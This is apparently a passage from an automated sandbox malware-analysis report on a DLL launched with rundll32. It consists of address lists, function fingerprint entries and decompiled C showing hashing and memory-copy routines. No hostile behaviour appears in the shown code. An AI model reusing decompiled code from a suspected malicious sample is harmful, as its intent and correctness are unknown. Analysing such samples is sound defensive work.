                                                      0x1002fa7c
                                                      0x1002f995
                                                      0x1002f995
                                                      0x1002f999
                                                      0x1002f99c
                                                      0x1002f99e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f99e
                                                      0x1002f98f
                                                      0x1002f53d
                                                      0x1002f53d
                                                      0x1002f53d
                                                      0x1002f53f
                                                      0x1002f53f
                                                      0x1002f543
                                                      0x1002f54a
                                                      0x1002f54d
                                                      0x1002f54d
                                                      0x1002f552
                                                      0x1002f556
                                                      0x1002f55d
                                                      0x1002f561
                                                      0x1002f568
                                                      0x1002f56c
                                                      0x1002f573
                                                      0x1002f573
                                                      0x1002f575
                                                      0x1002f575
                                                      0x1002f57c
                                                      0x1002f580
                                                      0x1002f583
                                                      0x1002f583
                                                      0x00000000
                                                      0x1002f575
                                                      0x1002f537
                                                      0x1002f529
                                                      0x1002f407
                                                      0x1002f407
                                                      0x1002f40a
                                                      0x1002f40c
                                                      0x1002f40e
                                                      0x1002f660
                                                      0x1002f667
                                                      0x1002f669
                                                      0x1002f669
                                                      0x1002f66b
                                                      0x1002f66b
                                                      0x1002f672
                                                      0x1002f679
                                                      0x1002f67c
                                                      0x1002f67c
                                                      0x1002f681
                                                      0x1002f688
                                                      0x1002f68a
                                                      0x1002f68f
                                                      0x1002f692
                                                      0x1002f695
                                                      0x1002f695
                                                      0x1002f69a
                                                      0x1002f69e
                                                      0x1002f69e
                                                      0x1002f6a2
                                                      0x1002f6a6
                                                      0x1002f6a9
                                                      0x1002f6ae
                                                      0x1002f6b0
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f6b6
                                                      0x1002f6b7
                                                      0x1002f6ba
                                                      0x00000000
                                                      0x1002f6bc
                                                      0x1002f6bc
                                                      0x00000000
                                                      0x1002f6bc
                                                      0x00000000
                                                      0x1002f6ba
                                                      0x1002f826
                                                      0x1002f82d
                                                      0x1002f82f
                                                      0x1002f838
                                                      0x1002f83a
                                                      0x1002f841
                                                      0x1002f844
                                                      0x1002f849
                                                      0x1002f84c
                                                      0x1002f84e
                                                      0x1002f851
                                                      0x1002f858
                                                      0x1002f59c
                                                      0x1002f59c
                                                      0x1002f5a0
                                                      0x1002f5a2
                                                      0x1002f5a6
                                                      0x1002f5aa
                                                      0x1002f5ae
                                                      0x1002f5b1
                                                      0x1002f5b4
                                                      0x1002f728
                                                      0x1002f72b
                                                      0x1002f5ba
                                                      0x1002f5ba
                                                      0x1002f5ba
                                                      0x1002f5ba
                                                      0x1002f5c0
                                                      0x1002f5c3
                                                      0x1002f5c5
                                                      0x1002f5c8
                                                      0x1002f5cf
                                                      0x1002f5d4
                                                      0x1002f5d6
                                                      0x1002f5d8
                                                      0x1002f5db
                                                      0x1002f5dd
                                                      0x1002f5df
                                                      0x1002f5e2
                                                      0x1002f5e5
                                                      0x1002f5eb
                                                      0x1002f5ed
                                                      0x1002f5f2
                                                      0x1002f5f5
                                                      0x1002f5f8
                                                      0x1002f5fa
                                                      0x1002f5ff
                                                      0x1002f5ff
                                                      0x1002f601
                                                      0x1002f604
                                                      0x1002f606
                                                      0x1002f608
                                                      0x1002f60b
                                                      0x1002f60e
                                                      0x1002f610
                                                      0x1002f612
                                                      0x1002f618
                                                      0x1002f61f
                                                      0x1002f624
                                                      0x1002f62c
                                                      0x1002f62c
                                                      0x1002f633
                                                      0x1002f635
                                                      0x1002f638
                                                      0x1002f63c
                                                      0x1002f63e
                                                      0x1002f640
                                                      0x1002f643
                                                      0x1002f645
                                                      0x1002f647
                                                      0x1002f64b
                                                      0x1002f64f
                                                      0x1002f653
                                                      0x00000000
                                                      0x1002f414
                                                      0x1002f414
                                                      0x1002f414
                                                      0x1002f417
                                                      0x1002f41c
                                                      0x1002f420
                                                      0x1002f426
                                                      0x1002f42a
                                                      0x1002f42e
                                                      0x1002f42e
                                                      0x1002f431
                                                      0x1002f431
                                                      0x1002f43b
                                                      0x1002f445
                                                      0x1002f44a
                                                      0x1002f44c
                                                      0x00000000
                                                      0x1002f452
                                                      0x1002f45c
                                                      0x1002f45e
                                                      0x1002f880
                                                      0x1002f880
                                                      0x1002f464
                                                      0x1002f464
                                                      0x1002f468
                                                      0x1002f470
                                                      0x1002f472
                                                      0x00000000
                                                      0x1002f478
                                                      0x1002f47e
                                                      0x1002f483
                                                      0x1002f486
                                                      0x1002f48f
                                                      0x1002f493
                                                      0x1002f4a6
                                                      0x1002f4ac
                                                      0x1002f4ae
                                                      0x00000000
                                                      0x1002f4b4
                                                      0x1002f4b4
                                                      0x1002f4b4
                                                      0x1002f4b8
                                                      0x1002f4c8
                                                      0x1002f4db
                                                      0x1002f4dd
                                                      0x1002f4df
                                                      0x1002f4e2
                                                      0x1002f4e2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f4c8
                                                      0x1002f4ae
                                                      0x1002f472
                                                      0x1002f45e
                                                      0x1002f44c
                                                      0x00000000
                                                      0x1002f40e
                                                      0x1002f401
                                                      0x1002f2e1
                                                      0x1002f2e1
                                                      0x1002f2e5
                                                      0x1002f2ea
                                                      0x1002f2ee
                                                      0x1002f2f1
                                                      0x1002f2f6
                                                      0x1002f2f8
                                                      0x1002f2fa
                                                      0x1002f6e0
                                                      0x1002f6e0
                                                      0x1002f4f2
                                                      0x1002f4fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f2fa
                                                      0x1002f2df

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_small_strptime$_mktime64mv_gettimemv_strcasecmp
                                                      • String ID: %H%M%S$%H:%M:%S$%Y - %m - %d$%Y%m%d$now
                                                      • API String ID: 3102546153-2275413634
                                                      • Opcode ID: 3b59df7daf9013c20f7f9f6ddd4171326e91ec71721b8f1468b8232903dcc860
                                                      • Instruction ID: 7f3ee14ce240381be5dd98d6c3d180aec0b6e0ebcf4911cbbe250e8a450d1d0f
                                                      • Opcode Fuzzy Hash: 3b59df7daf9013c20f7f9f6ddd4171326e91ec71721b8f1468b8232903dcc860
                                                      • Instruction Fuzzy Hash: F1518F75A083564FC344DF29948032AFBE1EFC8794F92893EE5D8C7391EA34D9458B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_tree_find
                                                      • String ID:
                                                      • API String ID: 59044961-0
                                                      • Opcode ID: 95cf165c7df1e3b14e8353417eaf65eff3f766b1f1fabdb0d3657f97e4e1532e
                                                      • Instruction ID: 92974a57f51364e3157bc9e69e38102b8c966e1fd57831e9c9b5ac2784e8d0df
                                                      • Opcode Fuzzy Hash: 95cf165c7df1e3b14e8353417eaf65eff3f766b1f1fabdb0d3657f97e4e1532e
                                                      • Instruction Fuzzy Hash: 1FC1C2B490974A9FC340DF6AC18081AFBE5FFC8654F61892EE898D7311E774E9418F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_tree_find
                                                      • String ID:
                                                      • API String ID: 59044961-0
                                                      • Opcode ID: 5ba1de0a2128bb80714fc7f87f514a6120d16dbb4c6ec235376ab0e5548afddf
                                                      • Instruction ID: 55863b4f0a31e834c219965d94d4823f7879c6ff1bed93916ad31882f3d71024
                                                      • Opcode Fuzzy Hash: 5ba1de0a2128bb80714fc7f87f514a6120d16dbb4c6ec235376ab0e5548afddf
                                                      • Instruction Fuzzy Hash: 8AC1D2B4909749AFC340DF6AC18091AFBE5FF88654F61892EE8D8D7311E734E9418F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 36%
                                                      			E1001C870(void* __ebx, void* __edi) {
                                                      				intOrPtr _t1167;
                                                      				void* _t1171;
                                                      
                                                      				_t1167 =  *((intOrPtr*)(_t1171 - 0x1c + 0x20));
                                                      				if( *(_t1167 + 4) > 0xe) {
                                                      					L3:
                                                      					return _t1167;
                                                      				} else {
                                                      					switch( *((intOrPtr*)( *(_t1167 + 4) * 4 +  &M100B2E44))) {
                                                      						case 0:
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							__eax = __esp[1];
                                                      							 *__eax = 0;
                                                      							 *(__eax + 4) = 0;
                                                      							 *((intOrPtr*)(__eax + 0x48)) = 0x10325476;
                                                      							 *((intOrPtr*)(__eax + 0x4c)) = 0x98badcfe;
                                                      							 *((intOrPtr*)(__eax + 0x50)) = 0xefcdab89;
                                                      							 *((intOrPtr*)(__eax + 0x54)) = 0x67452301;
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 1:
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							__esp = __esp - 0xc;
                                                      							__esp[1] = __esi;
                                                      							__ecx = __esp[4];
                                                      							__esi = 0;
                                                      							 *__esp = __ebx;
                                                      							__ebx = 0x20;
                                                      							__esp[2] = __edi;
                                                      							__eax = 0x10 + __ecx;
                                                      							if((__cl & 0x00000001) != 0) {
                                                      								 *(0x10 + __ecx) = 0;
                                                      								__eax = __ecx + 0x11;
                                                      								__ebx = 0x1f;
                                                      							}
                                                      							if((__al & 0x00000002) != 0) {
                                                      								 *__eax = 0;
                                                      								__ebx = __ebx - 2;
                                                      								__eax = __eax + 2;
                                                      							}
                                                      							__edi = __ebx;
                                                      							__edx = 0;
                                                      							__edi = __ebx & 0xfffffff8;
                                                      							do {
                                                      								 *(__eax + __edx) = __esi;
                                                      								 *(__eax + __edx + 4) = __esi;
                                                      								__edx = 8 + __edx;
                                                      							} while (__edx < __edi);
                                                      							__eax = __eax + __edx;
                                                      							if((__bl & 0x00000004) != 0) {
                                                      								 *__eax = 0;
                                                      								__eax = __eax + 4;
                                                      								if((__bl & 0x00000002) == 0) {
                                                      									goto L128;
                                                      								} else {
                                                      									goto L131;
                                                      								}
                                                      							} else {
                                                      								if((__bl & 0x00000002) != 0) {
                                                      									L131:
                                                      									 *__eax = 0;
                                                      									__eax = __eax + 2;
                                                      									if((__bl & 0x00000001) != 0) {
                                                      										goto L130;
                                                      									}
                                                      								} else {
                                                      									L128:
                                                      									if((__bl & 0x00000001) != 0) {
                                                      										L130:
                                                      										 *__eax = 0;
                                                      									}
                                                      								}
                                                      							}
                                                      							__ebx =  *__esp;
                                                      							 *(8 + __ecx) = 0xdaddca55;
                                                      							__esi = __esp[1];
                                                      							 *(__ecx + 0xc) = 0x725acc55;
                                                      							__edi = __esp[2];
                                                      							 *__ecx = 0xdaddca55;
                                                      							 *(__ecx + 4) = 0x725acc55;
                                                      							__esp =  &(__esp[3]);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 2:
                                                      							__edx = 0x80;
                                                      							__esp[1] = 0x80;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A5198();
                                                      							goto L3;
                                                      						case 3:
                                                      							__ecx = 0xa0;
                                                      							__esp[1] = 0xa0;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A5198();
                                                      							goto L3;
                                                      						case 4:
                                                      							__edx = 0x100;
                                                      							__esp[1] = 0x100;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A5198();
                                                      							goto L3;
                                                      						case 5:
                                                      							__ecx = 0x140;
                                                      							__esp[1] = 0x140;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A5198();
                                                      							goto L3;
                                                      						case 6:
                                                      							__edx = 0xa0;
                                                      							__esp[1] = 0xa0;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A52C0();
                                                      							goto L3;
                                                      						case 7:
                                                      							__ecx = 0xe0;
                                                      							__esp[1] = 0xe0;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A52C0();
                                                      							goto L3;
                                                      						case 8:
                                                      							__edx = 0x100;
                                                      							__esp[1] = 0x100;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A52C0();
                                                      							goto L3;
                                                      						case 9:
                                                      							__ecx = 0xe0;
                                                      							__esp[1] = 0xe0;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A53BC();
                                                      							goto L3;
                                                      						case 0xa:
                                                      							__edx = 0x100;
                                                      							__esp[1] = 0x100;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A53BC();
                                                      							goto L3;
                                                      						case 0xb:
                                                      							__ecx = 0x180;
                                                      							__esp[1] = 0x180;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A53BC();
                                                      							goto L3;
                                                      						case 0xc:
                                                      							__edx = 0x200;
                                                      							__esp[1] = 0x200;
                                                      							 *__esp = __eax;
                                                      							__eax = E100A53BC();
                                                      							goto L3;
                                                      						case 0xd:
                                                      							 *(__eax + 0xc) = 0xffffffff;
                                                      							goto L3;
                                                      						case 0xe:
                                                      							 *(_t1167 + 0xc) = 1;
                                                      							goto L3;
                                                      						case 0xf:
                                                      							__esp[0xa] = __ecx;
                                                      							__esp[9] = __edx;
                                                      							__eax =  *__ebx;
                                                      							__ebx = __esp[6];
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							__esp = __esp - 0x24;
                                                      							__esp[5] = __ebx;
                                                      							__ebx = __esp[0xa];
                                                      							__esp[8] = __ebp;
                                                      							__ebp = __esp[0xc];
                                                      							__esp[6] = __esi;
                                                      							__esp[7] = __edi;
                                                      							__edi = 0;
                                                      							__eax =  *__ebx;
                                                      							__edx =  *(__ebx + 4);
                                                      							__ebp = __eax + __ebp;
                                                      							 *__ebx = __eax + __ebp;
                                                      							asm("adc edi, edx");
                                                      							__eax = __eax & 0x0000003f;
                                                      							 *(__ebx + 4) = 0;
                                                      							 *__esp = __eax;
                                                      							if(__eax != 0) {
                                                      								__edx = 0x40;
                                                      								__edi = __eax;
                                                      								__esi = __esp[0xb];
                                                      								__edi = __ebx + __eax + 8;
                                                      								__edx = 0x40 - __eax;
                                                      								__eax = 8 + __ebx;
                                                      								__esp[2] = 8 + __ebx;
                                                      								__edx =  >  ? __ebp : __edx;
                                                      								__esp[1] = 0x40;
                                                      								if(0x40 >= 4) {
                                                      									if((__edi & 0x00000001) != 0) {
                                                      										__eax =  *__esi & 0x000000ff;
                                                      										__edi = __edi + 1;
                                                      										 *(__edi - 1) = __al;
                                                      										__eax = __esp[0xb];
                                                      										__esi = __esp[0xb] + 1;
                                                      										__eax = 0x3f;
                                                      										__esp[1] = 0x3f;
                                                      									}
                                                      									if((__edi & 0x00000002) != 0) {
                                                      										__eax =  *__esi & 0x0000ffff;
                                                      										__edi = __edi + 2;
                                                      										__esi = __esi + 2;
                                                      										 *(__edi - 2) = __ax;
                                                      										__esp[1] = __esp[1] - 2;
                                                      									}
                                                      									__eax = __esp[1];
                                                      									if(__eax >= 4) {
                                                      										__esp[3] = __edx;
                                                      										__eax = __eax & 0xfffffffc;
                                                      										__ecx = 0;
                                                      										__edx = __eax;
                                                      										do {
                                                      											__eax =  *(__esi + __ecx);
                                                      											 *(__edi + __ecx) =  *(__esi + __ecx);
                                                      											__ecx = __ecx + 4;
                                                      										} while (__ecx < __edx);
                                                      										__edx = __esp[3];
                                                      										__edi = __edi + __ecx;
                                                      										__esi = __esi + __ecx;
                                                      									}
                                                      								}
                                                      								__ecx = 0;
                                                      								if((__esp[1] & 0x00000002) != 0) {
                                                      									__eax =  *__esi & 0x0000ffff;
                                                      									__ecx = 2;
                                                      									 *__edi = __ax;
                                                      								}
                                                      								if((__esp[1] & 0x00000001) != 0) {
                                                      									__eax =  *(__esi + __ecx) & 0x000000ff;
                                                      									 *(__edi + __ecx) = __al;
                                                      								}
                                                      								__eax =  *__esp;
                                                      								__eax =  *__esp + __edx;
                                                      								if(__eax > 0x3f) {
                                                      									__esp[0xb] = __esp[0xb] + __edx;
                                                      									__ebp = __ebp - __edx;
                                                      									__edx = __esp[2];
                                                      									__eax = __ebx + 0x48;
                                                      									__ecx = 1;
                                                      									 *__esp = __eax;
                                                      									__eax = E10025550(__eax, 1, __esp[2]);
                                                      									__eax =  *__esp;
                                                      									goto L83;
                                                      								}
                                                      							} else {
                                                      								__eax = __ebx + 0x48;
                                                      								L83:
                                                      								__edx = __esp[0xb];
                                                      								__ecx = __ebp;
                                                      								__ecx = __ebp >> 6;
                                                      								__eax = __ebp;
                                                      								__eax = __ebp & 0x0000003f;
                                                      								if(__eax != 0) {
                                                      									__edi = __esp[0xb];
                                                      									__ecx = 8 + __ebx;
                                                      									__esi = __esp[0xb] + __ebp;
                                                      									if(__eax >= 4) {
                                                      										if((__cl & 0x00000001) != 0) {
                                                      											__ecx =  *__esi & 0x000000ff;
                                                      											__eax = __eax - 1;
                                                      											__esi = __esi + 1;
                                                      											 *(8 + __ebx) = __cl;
                                                      											__ecx = __ebx + 9;
                                                      										}
                                                      										if((__cl & 0x00000002) != 0) {
                                                      											__edi =  *__esi & 0x0000ffff;
                                                      											__ecx = __ecx + 2;
                                                      											__esi = __esi + 2;
                                                      											__eax = __eax - 2;
                                                      											 *(__ecx - 2) = __di;
                                                      										}
                                                      										if(__eax >= 4) {
                                                      											__edi = __eax;
                                                      											__edx = 0;
                                                      											__edi = __eax & 0xfffffffc;
                                                      											do {
                                                      												__ebx =  *(__esi + __edx);
                                                      												 *(__ecx + __edx) =  *(__esi + __edx);
                                                      												__edx = __edx + 4;
                                                      											} while (__edx < __edi);
                                                      											__ecx = __ecx + __edx;
                                                      											__esi = __esi + __edx;
                                                      										}
                                                      									}
                                                      									__edx = 0;
                                                      									if((__al & 0x00000002) != 0) {
                                                      										__edi =  *__esi & 0x0000ffff;
                                                      										__edx = 2;
                                                      										 *__ecx = __di;
                                                      										if((__al & 0x00000001) != 0) {
                                                      											goto L88;
                                                      										}
                                                      									} else {
                                                      										if((__al & 0x00000001) != 0) {
                                                      											L88:
                                                      											__eax =  *(__esi + __edx) & 0x000000ff;
                                                      											 *(__ecx + __edx) = __al;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							__ebx = __esp[5];
                                                      							__esi = __esp[6];
                                                      							__edi = __esp[7];
                                                      							__ebp = __esp[8];
                                                      							__esp =  &(__esp[9]);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x10:
                                                      							__esp[0xa] = __ecx;
                                                      							__esp[9] = __edx;
                                                      							__eax =  *__ebx;
                                                      							__ebx = __esp[6];
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							_push(__ebp);
                                                      							_push(__edi);
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x2c;
                                                      							__ecx = __esp[0x10];
                                                      							__edi = __esp[0x12];
                                                      							__ebx = __esp[0x11];
                                                      							__eax =  *__ecx;
                                                      							__edx =  *(__ecx + 4);
                                                      							 *__esp =  *__ecx;
                                                      							__eax =  *(8 + __ecx);
                                                      							__esp[1] =  *(__ecx + 4);
                                                      							__edx =  *(__ecx + 0xc);
                                                      							__esp[4] = __eax;
                                                      							__esp[5] =  *(__ecx + 0xc);
                                                      							if(__esp[0x12] == 0) {
                                                      								L176:
                                                      								__esp =  &(__esp[0xb]);
                                                      								_pop(__ebx);
                                                      								_pop(__esi);
                                                      								_pop(__edi);
                                                      								_pop(__ebp);
                                                      								return __eax;
                                                      							} else {
                                                      								__eax = __esp[0x12];
                                                      								__edx = 0;
                                                      								 *((intOrPtr*)(__ecx + 0x28)) =  *((intOrPtr*)(__ecx + 0x28)) + __esp[0x12];
                                                      								__eax =  *(__ecx + 0x20);
                                                      								asm("adc [ecx+0x2c], edx");
                                                      								if(__eax <= 0) {
                                                      									L171:
                                                      									__eax = __esp[0x12];
                                                      									__eax = __esp[0x12] & 0xfffffff0;
                                                      									__esp[9] = __eax;
                                                      									__eax = __eax + __ebx;
                                                      									__esp[6] = __eax;
                                                      									if(__ebx < __eax) {
                                                      										__esi =  *__esp;
                                                      										__ebp = __ebx;
                                                      										__esp[0x10] = __ecx;
                                                      										__edi = __esp[1];
                                                      										__esp[0x11] = __ebx;
                                                      										do {
                                                      											__eax =  *__ebp;
                                                      											__ebx = 0x114253d5;
                                                      											__ecx =  *(__ebp + 4) * 0x114253d5;
                                                      											__edx = __eax * 0x87c37b91;
                                                      											__ecx =  *(__ebp + 4) * 0x114253d5 + __eax * 0x87c37b91;
                                                      											__edx = __eax * 0x114253d5 >> 0x20;
                                                      											__eax = __eax * 0x114253d5;
                                                      											__ebx = 0x2745937f;
                                                      											__ecx = __edx;
                                                      											__eax = (__eax << 0x00000020 | __ecx) << 0x1f;
                                                      											__esp[2] = (__eax << 0x00000020 | __ecx) << 0x1f;
                                                      											__ecx = (__ecx << 0x00000020 | __eax) << 0x1f;
                                                      											__eax =  *(8 + __ebp);
                                                      											__esp[3] = __ecx;
                                                      											__ecx =  *(__ebp + 0xc) * 0x2745937f;
                                                      											__edx = __eax * 0x4cf5ad43;
                                                      											__ecx =  *(__ebp + 0xc) * 0x2745937f + __eax * 0x4cf5ad43;
                                                      											__edx = __eax * 0x2745937f >> 0x20;
                                                      											__eax = __eax * 0x2745937f;
                                                      											__edx = __edx + __ecx;
                                                      											__ecx = __eax;
                                                      											__ecx = (__edx << 0x00000020 | __eax) >> 0x1f;
                                                      											__ebx = __edx;
                                                      											__edx = __esp[3];
                                                      											 *__esp = __ecx;
                                                      											__ebx = (__eax << 0x00000020 | __ebx) >> 0x1f;
                                                      											__eax = __esp[2] * 0x4cf5ad43;
                                                      											__esp[1] = __ebx;
                                                      											__ebx = 5;
                                                      											__esp[3] * 0x2745937f = __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
                                                      											__eax = 0x2745937f;
                                                      											__edx = 0x2745937f * __esp[2] >> 0x20;
                                                      											__eax = 0x2745937f * __esp[2];
                                                      											__edx = (0x2745937f * __esp[2] >> 0x20) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
                                                      											__eax = 0x2745937f * __esp[2] ^ __esi;
                                                      											__edx = (0x2745937f * __esp[2] >> 0x00000020) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43 ^ __edi;
                                                      											__ecx = __eax;
                                                      											__eax = (__eax << 0x00000020 | __edx) << 0x1b;
                                                      											__edx = (__edx << 0x00000020 | __ecx) << 0x1b;
                                                      											__eax = __eax + __esp[4];
                                                      											asm("adc edx, [esp+0x14]");
                                                      											__ecx = __edx + __edx * 4;
                                                      											__edx = __eax * 5 >> 0x20;
                                                      											__eax = __eax * 5;
                                                      											__edx = __edx + __ecx;
                                                      											__esi = __eax;
                                                      											__edi = __edx;
                                                      											__edx = __esp[1];
                                                      											__esi = __eax + 0x52dce729;
                                                      											asm("adc edi, 0x0");
                                                      											__eax =  *__esp * 0x87c37b91;
                                                      											__esp[1] * 0x114253d5 = __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
                                                      											__eax = 0x114253d5;
                                                      											__edx = 0x114253d5 *  *__esp >> 0x20;
                                                      											__eax = 0x114253d5 *  *__esp;
                                                      											__edx = (0x114253d5 *  *__esp >> 0x20) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
                                                      											__ecx = __esp[4];
                                                      											__eax = 0x114253d5 *  *__esp ^ __esp[4];
                                                      											__ecx = __esp[5];
                                                      											__edx = (0x114253d5 *  *__esp >> 0x00000020) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91 ^ __esp[5];
                                                      											__ecx = __eax;
                                                      											__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                      											__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
                                                      											__eax = __eax + __esi;
                                                      											asm("adc edx, edi");
                                                      											__ecx = __edx + __edx * 4;
                                                      											__edx = __eax * 5 >> 0x20;
                                                      											__eax = __eax * 5;
                                                      											__edx = __edx + __ecx;
                                                      											__esp[4] = __eax;
                                                      											__eax = __esp[6];
                                                      											asm("adc edx, 0x0");
                                                      											__esp[5] = __edx;
                                                      											__ebp = 0x10 + __ebp;
                                                      										} while (__ebp < __esp[6]);
                                                      										__ebx = __esp[0x11];
                                                      										 *__esp = __esi;
                                                      										__eax = __esp[9];
                                                      										__esp[1] = __edi;
                                                      										__ecx = __esp[0x10];
                                                      										__ebx = __esp[0x11] + __esp[9];
                                                      									}
                                                      									__eax =  *__esp;
                                                      									__edx = __esp[1];
                                                      									 *__ecx =  *__esp;
                                                      									__eax = __esp[4];
                                                      									 *(__ecx + 4) = __esp[1];
                                                      									__edx = __esp[5];
                                                      									 *(8 + __ecx) = __esp[4];
                                                      									__eax = __esp[0x12];
                                                      									 *(__ecx + 0xc) = __esp[5];
                                                      									__eax = __esp[0x12] & 0x0000000f;
                                                      									if(__eax != 0) {
                                                      										__edi = __eax;
                                                      										__esi = 0x10 + __ecx;
                                                      										if(__eax >= 4) {
                                                      											if((__esi & 0x00000001) != 0) {
                                                      												__edx =  *__ebx & 0x000000ff;
                                                      												__esi = __ecx + 0x11;
                                                      												__ebx = __ebx + 1;
                                                      												__edi = __eax - 1;
                                                      												 *(0x10 + __ecx) = __dl;
                                                      											}
                                                      											if((__esi & 0x00000002) != 0) {
                                                      												__edx =  *__ebx & 0x0000ffff;
                                                      												__esi = __esi + 2;
                                                      												__ebx = __ebx + 2;
                                                      												__edi = __edi - 2;
                                                      												 *(__esi - 2) = __dx;
                                                      											}
                                                      											if(__edi >= 4) {
                                                      												 *__esp = __eax;
                                                      												__ebp = __edi;
                                                      												__edx = 0;
                                                      												__ebp = __edi & 0xfffffffc;
                                                      												do {
                                                      													__eax =  *(__ebx + __edx);
                                                      													 *(__esi + __edx) =  *(__ebx + __edx);
                                                      													__edx = __edx + 4;
                                                      												} while (__edx < __ebp);
                                                      												__eax =  *__esp;
                                                      												__esi = __esi + __edx;
                                                      												__ebx = __ebx + __edx;
                                                      											}
                                                      										}
                                                      										__edx = 0;
                                                      										if((__edi & 0x00000002) != 0) {
                                                      											__edx =  *__ebx & 0x0000ffff;
                                                      											 *__esi = __dx;
                                                      											__edx = 2;
                                                      										}
                                                      										if(__edi != 0) {
                                                      											__ebx =  *(__ebx + __edx) & 0x000000ff;
                                                      											 *(__esi + __edx) = __bl;
                                                      										}
                                                      										 *(__ecx + 0x20) = __eax;
                                                      										__esp =  &(__esp[0xb]);
                                                      										_pop(__ebx);
                                                      										_pop(__esi);
                                                      										_pop(__edi);
                                                      										_pop(__ebp);
                                                      										return __eax;
                                                      									} else {
                                                      										goto L176;
                                                      									}
                                                      								} else {
                                                      									if(__eax > 0xf) {
                                                      										L170:
                                                      										__eax =  *(0x10 + __ecx);
                                                      										__esi = 0x114253d5;
                                                      										__ebp =  *(__ecx + 0x14) * 0x114253d5;
